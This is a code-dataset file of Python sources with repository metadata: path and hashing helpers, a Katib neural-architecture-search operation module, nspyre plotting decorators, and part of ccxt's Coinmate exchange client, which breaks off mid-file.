def search_paths_for_executables(*path_hints):
executable_paths = []
for path in path_hints:
if not os.path.isdir(path):
continue
path = os.path.abspath(path)
executable_paths.append(path)
bin_dir = os.path.join(path, 'bin')
if os.path.isdir(bin_dir):
executable_paths.append(bin_dir)
return executable_paths
def partition_path(path, entry=None):
paths = prefixes(path)
if entry is not None:
# Derive the index of entry within paths, which will correspond to
# the location of the entry in within the path.
try:
entries = path.split(os.sep)
i = entries.index(entry)
if '' in entries:
i -= 1
return paths[:i], paths[i], paths[i + 1:]
except ValueError:
pass
return paths, '', []
def prefixes(path):
if not path:
return []
parts = path.strip(os.sep).split(os.sep)
if path.startswith(os.sep):
parts.insert(0, os.sep)
paths = [os.path.join(*parts[:i + 1]) for i in range(len(parts))]
try:
paths.remove(os.sep)
except ValueError:
pass
try:
paths.remove('.')
except ValueError:
pass
return paths
def md5sum(file):
md5 = hashlib.md5()
with open(file, "rb") as f:
md5.update(f.read())
return md5.digest()
def remove_directory_contents(dir):
if os.path.exists(dir):
for entry in [os.path.join(dir, entry) for entry in os.listdir(dir)]:
if os.path.isfile(entry) or os.path.islink(entry):
os.unlink(entry)
else:
shutil.rmtree(entry)
| true
| true
|
1c44735ee29ae80ebb1e9d736322620b52449d80
| 3,087
|
py
|
Python
|
pkg/suggestion/v1alpha1/NAS_Reinforcement_Learning/Operation.py
|
terrytangyuan/katib
|
5a7a144a1b33e05466174edd721803349622aabc
|
[
"Apache-2.0"
] | 6
|
2019-04-26T05:24:45.000Z
|
2020-03-16T15:54:23.000Z
|
pkg/suggestion/v1alpha1/NAS_Reinforcement_Learning/Operation.py
|
terrytangyuan/katib
|
5a7a144a1b33e05466174edd721803349622aabc
|
[
"Apache-2.0"
] | 30
|
2019-04-27T01:49:00.000Z
|
2021-02-01T08:52:32.000Z
|
pkg/suggestion/v1alpha1/NAS_Reinforcement_Learning/Operation.py
|
terrytangyuan/katib
|
5a7a144a1b33e05466174edd721803349622aabc
|
[
"Apache-2.0"
] | 4
|
2019-05-07T04:53:07.000Z
|
2020-10-21T09:10:26.000Z
|
import itertools
import numpy as np
from pkg.api.v1alpha1.python import api_pb2
class Operation(object):
def __init__(self, opt_id, opt_type, opt_params):
self.opt_id = opt_id
self.opt_type = opt_type
self.opt_params = opt_params
def get_dict(self):
opt_dict = dict()
opt_dict['opt_id'] = self.opt_id
opt_dict['opt_type'] = self.opt_type
opt_dict['opt_params'] = self.opt_params
return opt_dict
def print_op(self, logger):
logger.info("Operation ID: \n\t{}".format(self.opt_id))
logger.info("Operation Type: \n\t{}".format(self.opt_type))
logger.info("Operations Parameters:")
for ikey in self.opt_params:
logger.info("\t{}: {}".format(ikey, self.opt_params[ikey]))
logger.info("")
class SearchSpace(object):
def __init__(self, operations):
self.operation_list = list(operations.operation)
self.search_space = list()
self._parse_operations()
print()
self.num_operations = len(self.search_space)
def _parse_operations(self):
# search_sapce is a list of Operation class
operation_id = 0
for operation_dict in self.operation_list:
opt_type = operation_dict.operationType
opt_spec = list(operation_dict.parameter_configs.configs)
# avail_space is dict with the format {"spec_nam": [spec feasible values]}
avail_space = dict()
num_spec = len(opt_spec)
for ispec in opt_spec:
spec_name = ispec.name
if ispec.parameter_type == api_pb2.CATEGORICAL:
avail_space[spec_name] = list(ispec.feasible.list)
elif ispec.parameter_type == api_pb2.INT:
spec_min = int(ispec.feasible.min)
spec_max = int(ispec.feasible.max)
spec_step = int(ispec.feasible.step)
avail_space[spec_name] = range(spec_min, spec_max+1, spec_step)
elif ispec.parameter_type == api_pb2.DOUBLE:
spec_min = float(ispec.feasible.min)
spec_max = float(ispec.feasible.max)
spec_step = float(ispec.feasible.step)
double_list = np.arange(spec_min, spec_max+spec_step, spec_step)
if double_list[-1] > spec_max:
del double_list[-1]
avail_space[spec_name] = double_list
# generate all the combinations of possible operations
key_avail_space = list(avail_space.keys())
val_avail_space = list(avail_space.values())
for this_opt_vector in itertools.product(*val_avail_space):
opt_params = dict()
for i in range(num_spec):
opt_params[key_avail_space[i]] = this_opt_vector[i]
this_opt_class = Operation(operation_id, opt_type, opt_params)
self.search_space.append(this_opt_class)
operation_id += 1
| 40.090909
| 86
| 0.597344
|
import itertools
import numpy as np
from pkg.api.v1alpha1.python import api_pb2
class Operation(object):
def __init__(self, opt_id, opt_type, opt_params):
self.opt_id = opt_id
self.opt_type = opt_type
self.opt_params = opt_params
def get_dict(self):
opt_dict = dict()
opt_dict['opt_id'] = self.opt_id
opt_dict['opt_type'] = self.opt_type
opt_dict['opt_params'] = self.opt_params
return opt_dict
def print_op(self, logger):
logger.info("Operation ID: \n\t{}".format(self.opt_id))
logger.info("Operation Type: \n\t{}".format(self.opt_type))
logger.info("Operations Parameters:")
for ikey in self.opt_params:
logger.info("\t{}: {}".format(ikey, self.opt_params[ikey]))
logger.info("")
class SearchSpace(object):
def __init__(self, operations):
self.operation_list = list(operations.operation)
self.search_space = list()
self._parse_operations()
print()
self.num_operations = len(self.search_space)
def _parse_operations(self):
operation_id = 0
for operation_dict in self.operation_list:
opt_type = operation_dict.operationType
opt_spec = list(operation_dict.parameter_configs.configs)
avail_space = dict()
num_spec = len(opt_spec)
for ispec in opt_spec:
spec_name = ispec.name
if ispec.parameter_type == api_pb2.CATEGORICAL:
avail_space[spec_name] = list(ispec.feasible.list)
elif ispec.parameter_type == api_pb2.INT:
spec_min = int(ispec.feasible.min)
spec_max = int(ispec.feasible.max)
spec_step = int(ispec.feasible.step)
avail_space[spec_name] = range(spec_min, spec_max+1, spec_step)
elif ispec.parameter_type == api_pb2.DOUBLE:
spec_min = float(ispec.feasible.min)
spec_max = float(ispec.feasible.max)
spec_step = float(ispec.feasible.step)
double_list = np.arange(spec_min, spec_max+spec_step, spec_step)
if double_list[-1] > spec_max:
del double_list[-1]
avail_space[spec_name] = double_list
key_avail_space = list(avail_space.keys())
val_avail_space = list(avail_space.values())
for this_opt_vector in itertools.product(*val_avail_space):
opt_params = dict()
for i in range(num_spec):
opt_params[key_avail_space[i]] = this_opt_vector[i]
this_opt_class = Operation(operation_id, opt_type, opt_params)
self.search_space.append(this_opt_class)
operation_id += 1
| true
| true
|
1c4473c0e901afb9b524c273d6a5357d7d60c679
| 2,825
|
py
|
Python
|
src/nspyre/gui/widgets/views.py
|
AlexBourassa/nspyre
|
d254af09c7c8377552e85dba6f60b150fbb8da2e
|
[
"MIT"
] | 8
|
2019-12-06T14:49:34.000Z
|
2020-07-03T18:46:45.000Z
|
src/nspyre/gui/widgets/views.py
|
nspyre-org/nspyre
|
d254af09c7c8377552e85dba6f60b150fbb8da2e
|
[
"BSD-3-Clause"
] | 31
|
2020-09-21T21:01:06.000Z
|
2021-12-10T03:27:26.000Z
|
src/nspyre/gui/widgets/views.py
|
NSpyre-Dev/nspyre
|
d254af09c7c8377552e85dba6f60b150fbb8da2e
|
[
"BSD-3-Clause"
] | 4
|
2020-10-07T23:58:13.000Z
|
2022-03-01T15:22:34.000Z
|
class View:
"""Some Views for plotting."""
def __init__(self, f, plot_type):
self.update_fun = f
self.type = plot_type
self.init_formatters = dict()
self.update_formatters = dict()
def add_formatter(self, formatter):
if formatter.type == 'init':
self.init_formatters[formatter.handled_class] = formatter.format_fun
elif formatter.type == 'update':
self.update_formatters[formatter.handled_class] = formatter.format_fun
def get_formatter(self, plot, formatter_type):
formatters = self.init_formatters if formatter_type == 'init' else self.update_formatters
for c in formatters:
if issubclass(type(plot), c):
return formatters[c]
class Formatter:
def __init__(self, f, formatter_type, handled_class, view_list):
self.format_fun = f
self.type = formatter_type
self.handled_class = handled_class
self.view_list = view_list
def Plot1D(fun):
"""Functions marked with this decorators should take a single argument (beyond self) which will be the dataframe representing the data
The function marked must return a dict with the following format {'trace_name_1':[x1, y1], 'trace_name_2':[x2, y2], ...}"""
return View(fun, '1D')
def Plot2D(fun):
"""Functions marked with this decorators should take a single argument (beyond self) which will be the dataframe representing the data
The function marked must return a 2D ndarray to be plotted"""
return View(fun, '2D')
def PlotFormatInit(class_type_handled, view_list):
"""Functions marked with this decorators will be called once when initializing the views.
They should declare in the decorators argument what type of class they will handle.
For example, if a function wants to do some extra formatting on any subclass of BasePlotWidget from nspyre.widgets.plotting then:
@Plot1D()
def my_plot(self, df):
return {'trace1':[df.x.values, df.y1.values], 'trace2':[df.x.values, df.y2.values]}
@PlotFormat(BasePlotWidget, ['my_plot'])
def my_formating_function(self, plot):
plot.xlabel = 'x axis (in a.u.)'
There can only be one one PlotFormatInit function associated with a given plotting function
"""
def PlotFormatInit_Decorator(fun):
return Formatter(fun, 'init', class_type_handled, view_list)
return PlotFormatInit_Decorator
def PlotFormatUpdate(class_type_handled, view_list):
"""Same idea as PlotFormatUpdate, but functions marked with this decorators will be called every time the plot is updated."""
def PlotFormatUpdate_Decorator(fun):
return Formatter(fun, 'update', class_type_handled, view_list)
return PlotFormatUpdate_Decorator
| 41.544118
| 138
| 0.692389
|
class View:
def __init__(self, f, plot_type):
self.update_fun = f
self.type = plot_type
self.init_formatters = dict()
self.update_formatters = dict()
def add_formatter(self, formatter):
if formatter.type == 'init':
self.init_formatters[formatter.handled_class] = formatter.format_fun
elif formatter.type == 'update':
self.update_formatters[formatter.handled_class] = formatter.format_fun
def get_formatter(self, plot, formatter_type):
formatters = self.init_formatters if formatter_type == 'init' else self.update_formatters
for c in formatters:
if issubclass(type(plot), c):
return formatters[c]
class Formatter:
def __init__(self, f, formatter_type, handled_class, view_list):
self.format_fun = f
self.type = formatter_type
self.handled_class = handled_class
self.view_list = view_list
def Plot1D(fun):
return View(fun, '1D')
def Plot2D(fun):
return View(fun, '2D')
def PlotFormatInit(class_type_handled, view_list):
def PlotFormatInit_Decorator(fun):
return Formatter(fun, 'init', class_type_handled, view_list)
return PlotFormatInit_Decorator
def PlotFormatUpdate(class_type_handled, view_list):
def PlotFormatUpdate_Decorator(fun):
return Formatter(fun, 'update', class_type_handled, view_list)
return PlotFormatUpdate_Decorator
| true
| true
|
1c4473f0c25ec1b733d34e3f0547784dd273bf3a
| 38,712
|
py
|
Python
|
python/ccxt/coinmate.py
|
Dan-krm/ccxt
|
2ed8b7b8598e2934559822d81a8d14885b4d4ad3
|
[
"MIT"
] | null | null | null |
python/ccxt/coinmate.py
|
Dan-krm/ccxt
|
2ed8b7b8598e2934559822d81a8d14885b4d4ad3
|
[
"MIT"
] | null | null | null |
python/ccxt/coinmate.py
|
Dan-krm/ccxt
|
2ed8b7b8598e2934559822d81a8d14885b4d4ad3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class coinmate(Exchange):
def describe(self):
return self.deep_extend(super(coinmate, self).describe(), {
'id': 'coinmate',
'name': 'CoinMate',
'countries': ['GB', 'CZ', 'EU'], # UK, Czech Republic
'rateLimit': 1000,
'has': {
'CORS': True,
'spot': True,
'margin': False,
'swap': False,
'future': False,
'option': False,
'addMargin': False,
'cancelOrder': True,
'createOrder': True,
'createReduceOnlyOrder': False,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRateHistories': False,
'fetchBorrowRateHistory': False,
'fetchBorrowRates': False,
'fetchBorrowRatesPerSymbol': False,
'fetchFundingHistory': False,
'fetchFundingRate': False,
'fetchFundingRateHistory': False,
'fetchFundingRates': False,
'fetchIndexOHLCV': False,
'fetchLeverage': False,
'fetchLeverageTiers': False,
'fetchMarkets': True,
'fetchMarkOHLCV': False,
'fetchMyTrades': True,
'fetchOpenInterestHistory': False,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchPosition': False,
'fetchPositions': False,
'fetchPositionsRisk': False,
'fetchPremiumIndexOHLCV': False,
'fetchTicker': True,
'fetchTrades': True,
'fetchTradingFee': True,
'fetchTradingFees': False,
'fetchTransactions': True,
'reduceMargin': False,
'setLeverage': False,
'setMarginMode': False,
'setPositionMode': False,
'transfer': False,
'withdraw': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87460806-1c9f3f00-c616-11ea-8c46-a77018a8f3f4.jpg',
'api': 'https://coinmate.io/api',
'www': 'https://coinmate.io',
'fees': 'https://coinmate.io/fees',
'doc': [
'https://coinmate.docs.apiary.io',
'https://coinmate.io/developers',
],
'referral': 'https://coinmate.io?referral=YTFkM1RsOWFObVpmY1ZjMGREQmpTRnBsWjJJNVp3PT0',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'uid': True,
},
'api': {
'public': {
'get': [
'orderBook',
'ticker',
'transactions',
'tradingPairs',
],
},
'private': {
'post': [
'balances',
'bitcoinCashWithdrawal',
'bitcoinCashDepositAddresses',
'bitcoinDepositAddresses',
'bitcoinWithdrawal',
'bitcoinWithdrawalFees',
'buyInstant',
'buyLimit',
'cancelOrder',
'cancelOrderWithInfo',
'createVoucher',
'dashDepositAddresses',
'dashWithdrawal',
'ethereumWithdrawal',
'ethereumDepositAddresses',
'litecoinWithdrawal',
'litecoinDepositAddresses',
'openOrders',
'order',
'orderHistory',
'orderById',
'pusherAuth',
'redeemVoucher',
'replaceByBuyLimit',
'replaceByBuyInstant',
'replaceBySellLimit',
'replaceBySellInstant',
'rippleDepositAddresses',
'rippleWithdrawal',
'sellInstant',
'sellLimit',
'transactionHistory',
'traderFees',
'tradeHistory',
'transfer',
'transferHistory',
'unconfirmedBitcoinDeposits',
'unconfirmedBitcoinCashDeposits',
'unconfirmedDashDeposits',
'unconfirmedEthereumDeposits',
'unconfirmedLitecoinDeposits',
'unconfirmedRippleDeposits',
],
},
},
'fees': {
'trading': {
'tierBased': True,
'percentage': True,
'maker': 0.12 / 100,
'taker': 0.25 / 100,
'tiers': {
'taker': [
[self.parse_number('0'), self.parse_number('0.0035')],
[self.parse_number('10000'), self.parse_number('0.0023')],
[self.parse_number('100000'), self.parse_number('0.0021')],
[self.parse_number('250000'), self.parse_number('0.0020')],
[self.parse_number('500000'), self.parse_number('0.0015')],
[self.parse_number('1000000'), self.parse_number('0.0013')],
[self.parse_number('3000000'), self.parse_number('0.0010')],
[self.parse_number('15000000'), self.parse_number('0.0005')],
],
'maker': [
[self.parse_number('0'), self.parse_number('0.003')],
[self.parse_number('10000'), self.parse_number('0.0011')],
[self.parse_number('100000'), self.parse_number('0.0010')],
[self.parse_number('250000'), self.parse_number('0.0008')],
[self.parse_number('500000'), self.parse_number('0.0005')],
[self.parse_number('1000000'), self.parse_number('0.0003')],
[self.parse_number('3000000'), self.parse_number('0.0002')],
[self.parse_number('15000000'), self.parse_number('0')],
],
},
},
},
'options': {
'withdraw': {
'fillResponsefromRequest': True,
'methods': {
'BTC': 'privatePostBitcoinWithdrawal',
'LTC': 'privatePostLitecoinWithdrawal',
'BCH': 'privatePostBitcoinCashWithdrawal',
'ETH': 'privatePostEthereumWithdrawal',
'XRP': 'privatePostRippleWithdrawal',
'DASH': 'privatePostDashWithdrawal',
'DAI': 'privatePostDaiWithdrawal',
},
},
},
'exceptions': {
'exact': {
'No order with given ID': OrderNotFound,
},
'broad': {
'Not enough account balance available': InsufficientFunds,
'Incorrect order ID': InvalidOrder,
'Minimum Order Size ': InvalidOrder,
'TOO MANY REQUESTS': RateLimitExceeded,
'Access denied.': AuthenticationError, # {"error":true,"errorMessage":"Access denied.","data":null}
},
},
'precisionMode': TICK_SIZE,
})
def fetch_markets(self, params={}):
"""
retrieves data on all markets for coinmate
:param dict params: extra parameters specific to the exchange api endpoint
:returns [dict]: an array of objects representing market data
"""
response = self.publicGetTradingPairs(params)
#
# {
# "error":false,
# "errorMessage":null,
# "data": [
# {
# "name":"BTC_EUR",
# "firstCurrency":"BTC",
# "secondCurrency":"EUR",
# "priceDecimals":2,
# "lotDecimals":8,
# "minAmount":0.0002,
# "tradesWebSocketChannelId":"trades-BTC_EUR",
# "orderBookWebSocketChannelId":"order_book-BTC_EUR",
# "tradeStatisticsWebSocketChannelId":"statistics-BTC_EUR"
# },
# ]
# }
#
data = self.safe_value(response, 'data', [])
result = []
for i in range(0, len(data)):
market = data[i]
id = self.safe_string(market, 'name')
baseId = self.safe_string(market, 'firstCurrency')
quoteId = self.safe_string(market, 'secondCurrency')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': None,
'baseId': baseId,
'quoteId': quoteId,
'settleId': None,
'type': 'spot',
'spot': True,
'margin': False,
'swap': False,
'future': False,
'option': False,
'active': None,
'contract': False,
'linear': None,
'inverse': None,
'contractSize': None,
'expiry': None,
'expiryDatetime': None,
'strike': None,
'optionType': None,
'precision': {
'amount': self.parse_number(self.parse_precision(self.safe_string(market, 'lotDecimals'))),
'price': self.parse_number(self.parse_precision(self.safe_string(market, 'priceDecimals'))),
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': self.safe_number(market, 'minAmount'),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
'info': market,
})
return result
def parse_balance(self, response):
balances = self.safe_value(response, 'data', {})
result = {'info': response}
currencyIds = list(balances.keys())
for i in range(0, len(currencyIds)):
currencyId = currencyIds[i]
code = self.safe_currency_code(currencyId)
balance = self.safe_value(balances, currencyId)
account = self.account()
account['free'] = self.safe_string(balance, 'available')
account['used'] = self.safe_string(balance, 'reserved')
account['total'] = self.safe_string(balance, 'balance')
result[code] = account
return self.safe_balance(result)
def fetch_balance(self, params={}):
"""
query for balance and get the amount of funds available for trading or funds locked in orders
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: a `balance structure <https://docs.ccxt.com/en/latest/manual.html?#balance-structure>`
"""
self.load_markets()
response = self.privatePostBalances(params)
return self.parse_balance(response)
def fetch_order_book(self, symbol, limit=None, params={}):
"""
fetches information on open orders with bid(buy) and ask(sell) prices, volumes and other data
:param str symbol: unified symbol of the market to fetch the order book for
:param int|None limit: the maximum amount of order book entries to return
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: A dictionary of `order book structures <https://docs.ccxt.com/en/latest/manual.html#order-book-structure>` indexed by market symbols
"""
self.load_markets()
request = {
'currencyPair': self.market_id(symbol),
'groupByPriceLimit': 'False',
}
response = self.publicGetOrderBook(self.extend(request, params))
orderbook = response['data']
timestamp = self.safe_timestamp(orderbook, 'timestamp')
return self.parse_order_book(orderbook, symbol, timestamp, 'bids', 'asks', 'price', 'amount')
def fetch_ticker(self, symbol, params={}):
"""
fetches a price ticker, a statistical calculation with the information calculated over the past 24 hours for a specific market
:param str symbol: unified symbol of the market to fetch the ticker for
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: a `ticker structure <https://docs.ccxt.com/en/latest/manual.html#ticker-structure>`
"""
self.load_markets()
request = {
'currencyPair': self.market_id(symbol),
}
response = self.publicGetTicker(self.extend(request, params))
ticker = self.safe_value(response, 'data')
timestamp = self.safe_timestamp(ticker, 'timestamp')
last = self.safe_number(ticker, 'last')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high'),
'low': self.safe_number(ticker, 'low'),
'bid': self.safe_number(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_number(ticker, 'ask'),
'vwap': None,
'askVolume': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': self.safe_number(ticker, 'amount'),
'quoteVolume': None,
'info': ticker,
}
def fetch_transactions(self, code=None, since=None, limit=None, params={}):
"""
fetch history of deposits and withdrawals
:param str|None code: unified currency code for the currency of the transactions, default is None
:param int|None since: timestamp in ms of the earliest transaction, default is None
:param int|None limit: max number of transactions to return, default is None
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: a list of `transaction structure <https://docs.ccxt.com/en/latest/manual.html#transaction-structure>`
"""
self.load_markets()
request = {
'limit': 1000,
}
if limit is not None:
request['limit'] = limit
if since is not None:
request['timestampFrom'] = since
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
response = self.privatePostTransferHistory(self.extend(request, params))
items = response['data']
return self.parse_transactions(items, None, since, limit)
def parse_transaction_status(self, status):
statuses = {
'COMPLETED': 'ok',
'WAITING': 'pending',
'SENT': 'pending',
'CREATED': 'pending',
'OK': 'ok',
'NEW': 'pending',
'CANCELED': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# deposits
#
# {
# transactionId: 1862815,
# timestamp: 1516803982388,
# amountCurrency: 'LTC',
# amount: 1,
# fee: 0,
# walletType: 'LTC',
# transferType: 'DEPOSIT',
# transferStatus: 'COMPLETED',
# txid:
# 'ccb9255dfa874e6c28f1a64179769164025329d65e5201849c2400abd6bce245',
# destination: 'LQrtSKA6LnhcwRrEuiborQJnjFF56xqsFn',
# destinationTag: null
# }
#
# withdrawals
#
# {
# transactionId: 2140966,
# timestamp: 1519314282976,
# amountCurrency: 'EUR',
# amount: 8421.7228,
# fee: 16.8772,
# walletType: 'BANK_WIRE',
# transferType: 'WITHDRAWAL',
# transferStatus: 'COMPLETED',
# txid: null,
# destination: null,
# destinationTag: null
# }
#
# withdraw
#
# {
# "id": 2132583,
# }
#
timestamp = self.safe_integer(transaction, 'timestamp')
amount = self.safe_number(transaction, 'amount')
fee = self.safe_number(transaction, 'fee')
txid = self.safe_string(transaction, 'txid')
address = self.safe_string(transaction, 'destination')
tag = self.safe_string(transaction, 'destinationTag')
currencyId = self.safe_string(transaction, 'amountCurrency')
code = self.safe_currency_code(currencyId, currency)
type = self.safe_string_lower(transaction, 'transferType')
status = self.parse_transaction_status(self.safe_string(transaction, 'transferStatus'))
id = self.safe_string_2(transaction, 'transactionId', 'id')
network = self.safe_string(transaction, 'walletType')
return {
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'currency': code,
'amount': amount,
'type': type,
'txid': txid,
'network': network,
'address': address,
'addressTo': None,
'addressFrom': None,
'tag': tag,
'tagTo': None,
'tagFrom': None,
'status': status,
'fee': {
'cost': fee,
'currency': code,
},
'info': transaction,
}
def withdraw(self, code, amount, address, tag=None, params={}):
"""
make a withdrawal
:param str code: unified currency code
:param float amount: the amount to withdraw
:param str address: the address to withdraw to
:param str|None tag:
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: a `transaction structure <https://docs.ccxt.com/en/latest/manual.html#transaction-structure>`
"""
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
self.load_markets()
currency = self.currency(code)
withdrawOptions = self.safe_value(self.options, 'withdraw', {})
methods = self.safe_value(withdrawOptions, 'methods', {})
method = self.safe_string(methods, code)
if method is None:
allowedCurrencies = list(methods.keys())
raise ExchangeError(self.id + ' withdraw() only allows withdrawing the following currencies: ' + ', '.join(allowedCurrencies))
request = {
'amount': self.currency_to_precision(code, amount),
'address': address,
}
if tag is not None:
request['destinationTag'] = tag
response = getattr(self, method)(self.extend(request, params))
#
# {
# "error": False,
# "errorMessage": null,
# "data": {
# "id": "9e0a37fc-4ab4-4b9d-b9e7-c9c8f7c4c8e0"
# }
# }
#
data = self.safe_value(response, 'data')
transaction = self.parse_transaction(data, currency)
fillResponseFromRequest = self.safe_value(withdrawOptions, 'fillResponseFromRequest', True)
if fillResponseFromRequest:
transaction['amount'] = amount
transaction['currency'] = code
transaction['address'] = address
transaction['tag'] = tag
transaction['type'] = 'withdrawal'
transaction['status'] = 'pending'
return transaction
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
"""
fetch all trades made by the user
:param str|None symbol: unified market symbol
:param int|None since: the earliest time in ms to fetch trades for
:param int|None limit: the maximum number of trades structures to retrieve
:param dict params: extra parameters specific to the coinmate api endpoint
:returns [dict]: a list of `trade structures <https://docs.ccxt.com/en/latest/manual.html#trade-structure>`
"""
self.load_markets()
if limit is None:
limit = 1000
request = {
'limit': limit,
}
if symbol is not None:
market = self.market(symbol)
request['currencyPair'] = market['id']
if since is not None:
request['timestampFrom'] = since
response = self.privatePostTradeHistory(self.extend(request, params))
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, None, since, limit)
def parse_trade(self, trade, market=None):
#
# fetchMyTrades(private)
#
# {
# transactionId: 2671819,
# createdTimestamp: 1529649127605,
# currencyPair: 'LTC_BTC',
# type: 'BUY',
# orderType: 'LIMIT',
# orderId: 101810227,
# amount: 0.01,
# price: 0.01406,
# fee: 0,
# feeType: 'MAKER'
# }
#
# fetchTrades(public)
#
# {
# "timestamp":1561598833416,
# "transactionId":"4156303",
# "price":10950.41,
# "amount":0.004,
# "currencyPair":"BTC_EUR",
# "tradeType":"BUY"
# }
#
marketId = self.safe_string(trade, 'currencyPair')
market = self.safe_market(marketId, market, '_')
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string(trade, 'amount')
side = self.safe_string_lower_2(trade, 'type', 'tradeType')
type = self.safe_string_lower(trade, 'orderType')
orderId = self.safe_string(trade, 'orderId')
id = self.safe_string(trade, 'transactionId')
timestamp = self.safe_integer_2(trade, 'timestamp', 'createdTimestamp')
fee = None
feeCostString = self.safe_string(trade, 'fee')
if feeCostString is not None:
fee = {
'cost': feeCostString,
'currency': market['quote'],
}
takerOrMaker = self.safe_string(trade, 'feeType')
takerOrMaker = 'maker' if (takerOrMaker == 'MAKER') else 'taker'
return self.safe_trade({
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'type': type,
'side': side,
'order': orderId,
'takerOrMaker': takerOrMaker,
'price': priceString,
'amount': amountString,
'cost': None,
'fee': fee,
}, market)
def fetch_trades(self, symbol, since=None, limit=None, params={}):
"""
get the list of most recent trades for a particular symbol
:param str symbol: unified symbol of the market to fetch trades for
:param int|None since: timestamp in ms of the earliest trade to fetch
:param int|None limit: the maximum amount of trades to fetch
:param dict params: extra parameters specific to the coinmate api endpoint
:returns [dict]: a list of `trade structures <https://docs.ccxt.com/en/latest/manual.html?#public-trades>`
"""
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
'minutesIntoHistory': 10,
}
response = self.publicGetTransactions(self.extend(request, params))
#
# {
# "error":false,
# "errorMessage":null,
# "data":[
# {
# "timestamp":1561598833416,
# "transactionId":"4156303",
# "price":10950.41,
# "amount":0.004,
# "currencyPair":"BTC_EUR",
# "tradeType":"BUY"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, market, since, limit)
def fetch_trading_fee(self, symbol, params={}):
"""
fetch the trading fees for a market
:param str symbol: unified market symbol
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: a `fee structure <https://docs.ccxt.com/en/latest/manual.html#fee-structure>`
"""
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
}
response = self.privatePostTraderFees(self.extend(request, params))
#
# {
# error: False,
# errorMessage: null,
# data: {maker: '0.3', taker: '0.35', timestamp: '1646253217815'}
# }
#
data = self.safe_value(response, 'data', {})
makerString = self.safe_string(data, 'maker')
takerString = self.safe_string(data, 'taker')
maker = self.parse_number(Precise.string_div(makerString, '100'))
taker = self.parse_number(Precise.string_div(takerString, '100'))
return {
'info': data,
'symbol': symbol,
'maker': maker,
'taker': taker,
'percentage': True,
'tierBased': True,
}
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
"""
fetch all unfilled currently open orders
:param str|None symbol: unified market symbol
:param int|None since: the earliest time in ms to fetch open orders for
:param int|None limit: the maximum number of open orders structures to retrieve
:param dict params: extra parameters specific to the coinmate api endpoint
:returns [dict]: a list of `order structures <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
response = self.privatePostOpenOrders(self.extend({}, params))
extension = {'status': 'open'}
return self.parse_orders(response['data'], None, since, limit, extension)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
"""
fetches information on multiple orders made by the user
:param str symbol: unified market symbol of the market orders were made in
:param int|None since: the earliest time in ms to fetch orders for
:param int|None limit: the maximum number of orde structures to retrieve
:param dict params: extra parameters specific to the coinmate api endpoint
:returns [dict]: a list of [order structures]{@link https://docs.ccxt.com/en/latest/manual.html#order-structure
"""
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrders() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
}
# offset param that appears in other parts of the API doesn't appear to be supported here
if limit is not None:
request['limit'] = limit
response = self.privatePostOrderHistory(self.extend(request, params))
return self.parse_orders(response['data'], market, since, limit)
def parse_order_status(self, status):
statuses = {
'FILLED': 'closed',
'CANCELLED': 'canceled',
'PARTIALLY_FILLED': 'open',
'OPEN': 'open',
}
return self.safe_string(statuses, status, status)
def parse_order_type(self, type):
types = {
'LIMIT': 'limit',
'MARKET': 'market',
}
return self.safe_string(types, type, type)
def parse_order(self, order, market=None):
#
# limit sell
#
# {
# id: 781246605,
# timestamp: 1584480015133,
# trailingUpdatedTimestamp: null,
# type: 'SELL',
# currencyPair: 'ETH_BTC',
# price: 0.0345,
# amount: 0.01,
# stopPrice: null,
# originalStopPrice: null,
# marketPriceAtLastUpdate: null,
# marketPriceAtOrderCreation: null,
# orderTradeType: 'LIMIT',
# hidden: False,
# trailing: False,
# clientOrderId: null
# }
#
# limit buy
#
# {
# id: 67527001,
